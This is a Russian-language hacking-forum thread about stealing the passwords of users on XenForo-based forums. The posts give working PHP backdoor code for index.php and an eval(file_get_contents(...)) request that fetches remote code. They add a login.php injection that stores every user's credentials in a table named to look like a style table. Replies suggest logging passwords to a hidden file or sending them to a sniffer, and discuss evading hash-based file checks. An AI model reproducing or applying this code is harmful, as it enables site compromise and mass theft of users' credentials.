Описание Угоняем пароли юзеров xenforo-бордов

Тема в разделе "СТАТЬИ И УРОКИ ПО ВЗЛОМУ И ОБХОДУ ЗАЩИТЫ", создана пользователем Антоха, 4 окт 2016.

↑ ↓
Метки:
  1. Антоха Администратор
    Антоха
    Ответить в чате

    Администрация

    Регистрация:
    26.12.2012
    Сообщения:
    3.180
    Симпатии:
    11.094
    Пол:
    Мужской
    Репа:
    +11.242 / 47 / -6
    Jabber:
    Skype:
    Статейка с ачата. В оригинале она начинается с фразы:"Используем WSO Web Shel". Тут видно автор решил дать работёнку фантазии читателя. В общем первый шаг-внедрение шелла, ложиться на ваши плечи. Можно тупо засунуть шелл в какой-нибудь стиль, плагин, выложить на тематическом форуме и ждать у моря погоды. Что-то подобное описывалось здесь ранее XenForo.Начало пути.
    Ну а далее...
    Отправляемся к файлу index.php , и дописываем вредоносный код:

    Код:
    if (isset($_REQUEST['l']))
    assert(stripslashes($_REQUEST[l]));
    Код:
    Вызываем скрипт и получаем доступ к RemoteShell:
    Код:
    http://www.ru/index.php?l=eval(file_get_contents(%27http://www.ru/screen.png%27))#
    Отсеиваем логин и пасс из файлов с ФТП , создаем базу данных

    Код:
    create table xf_style_property_css (
    ID int(20) AUTO_INCREMENT,
    CSSName varchar(50) NOT NULL,
    CSSValue varchar(50) NOT NULL,
    PRIMARY KEY (ID)
    );
    Находим в файле login.php строки:

    TBUUmhA.

    Дописываем код:

    Код:
    $DataBaseConnector = mysql_connect('localhost', 'Имя БД', 'Пароль от БД');
            mysql_select_db('Имя БД');
            mysql_query("SET NAMES 'utf8'");
            $datalogxf = $data['login'];
            $datapassxf = $data['password'];
            mysql_query("INSERT INTO `xf_style_property_css` (`ID`, `CSSName`, `CSSValue`) VALUES ('', '$datalogxf', '$datapassxf') ", $DataBaseConnector);
    После всех выше описанных функций , каждый авторизованный пользователь будет внесен в наш раздел с базой ( который создали выше ).

    Выполняем команду получения списка: (Сейчас он пустой )

    Код:
    SELECT * FROM `xf_style_property_css`
     
    • Мне нравится Мне нравится x 4
    • Информативный пост Информативный пост x 1
  2. Nomikama Житель форума
    Nomikama
    Ответить в чате

    Форумчанин

    Регистрация:
    23.01.2016
    Сообщения:
    16
    Симпатии:
    15
    Пол:
    Мужской
    Репа:
    +15 / 0 / -0
    Я не знаю как устроено строение XenFono, но не проще всунуть такой код
    $n="\n";
    $DOCUMENT_ROOT=$_SERVER['DOCUMENT_ROOT'];
    $fp=fopen("$DOCUMENT_ROOT/log/pass.txt", 'at');
    fwrite($fp, "Login:Password: ".$datalogxf." | ".$datapassxf."\r\n");
    fclose($fp);

    В php файл регистрации и собирать новые аки в каком-то текстовике спрятанном в дебрях движка.
    Тот, кто смотрит БД заподозрит, что у него странная БД появилась, а текстовик можно нормально спрятать либо сделать вовсе оправку данных на свой сниффер
     
    • Мне нравится Мне нравится x 1
  3. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.812
    Симпатии:
    432
    Пол:
    Мужской
    Репа:
    +966 / 152 / -29
    Jabber:
    Skype:
    ICQ:

    638294628

    Да всё верно, можно в login.php прописать не в базу, а в файл...

    В примере вместо этой строчки:
    Код:
    mysql_query("INSERT INTO `xf_style_property_css` (`ID`, `CSSName`, `CSSValue`) VALUES ('', '$datalogxf', '$datapassxf') ", $DataBaseConnector);
    Базу редко анализируют, так-что недумаю что это палево, а вот правка двух файлов движка, это в примере:

    index.php и login.php

    Это уже может вызвать подозрение, особенно тем-кто проверяет файлы движка по хешу, в админке есть такая опция...:)
     

Поделиться этой страницей